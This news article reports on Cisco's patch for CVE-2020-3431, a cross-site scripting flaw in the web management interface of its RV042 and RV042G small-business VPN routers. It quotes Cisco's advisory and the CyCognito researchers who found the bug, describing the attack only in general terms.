Cisco SMB kit harbors cross-site scripting bug: One wrong link click... and that's your router pwned remotely
VPN gear vulnerable to remote hijackings
Cisco has patched a cross-site scripting vulnerability in two VPN routers it sells to small businesses and branch offices.
The software update addresses CVE-2020-3431, a bug present in the Cisco Small Business RV042 Dual WAN VPN Router and Cisco Small Business RV042G Dual Gigabit WAN VPN Router. We're told this flaw can be exploited by "an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based management interface of an affected device."
In other words, if someone tricks you into clicking on a specially crafted link in a browser, for instance, they can potentially access your equipment's management interface as you, changing or snooping on your configuration settings to gain further access or cause mischief. This requires the web-based interface to be enabled. By default, the management feature is disabled for remote users, though it is enabled for people on the same LAN.
"A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive browser-based information," Cisco explained in its advisory yesterday.
"The vulnerability is due to insufficient validation of user-supplied input by the web-based management interface of the affected software. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link.
"To determine whether the remote management feature is enabled for a device, open the web-based management interface through a local LAN connection and choose Basic Settings > Remote Management. If the 'Enable' check box is checked, remote management is enabled for the device."
Bored at home? Cisco has just the thing: A shed-load of security fixes to install, from a Kerberos bypass to crashesREAD MORE
Switchzilla said it squashed the bug in its 22.214.171.124 firmware update for both models.
While Cisco classified CVE-2020-3431 as a "moderate" security risk, infosec outfit CyCognito, which discovered and reported the vulnerability, told The Register on Wednesday that in the worst-case scenario, a miscreant could exploit the flaw to ultimately take complete control of the device before moving laterally.
The attacker could, say, send a network administrator an email containing a link to a page that exploited the XSS bug to hijack the VPN gateway.
"Once he clicks on the link we can run the web page, we can basically control his administrator account, we can get credentials," explained CyCognito head of security research Alex Zaslavsky, who, along with researcher Chen Bremer, was credited with finding the bug. "Web connections can be very powerful, once we get his credentials we can change anything."
While working in the field with a large unnamed customer, CyCognito uncovered the flaw in a router in a branch office, we're told. CyCognito then investigated the issue and, after figuring out the details of the vulnerability, reported it to Cisco for patching. Last night, Cisco said it was "not aware of any public announcements or malicious use of the vulnerability." ®